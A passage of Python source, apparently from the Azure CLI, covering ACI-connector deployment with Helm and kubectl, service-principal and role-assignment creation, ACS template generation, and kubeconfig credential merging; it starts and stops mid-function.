location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = _get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _get_subscription_id(cli_ctx):
_, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None)
return sub_id
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if addition[key]:
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
raise CLIError('A different object named {} already exists in {}'.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
else:
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port)
_, browse_path = tempfile.mkstemp()
# TODO: need to add an --admin option?
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
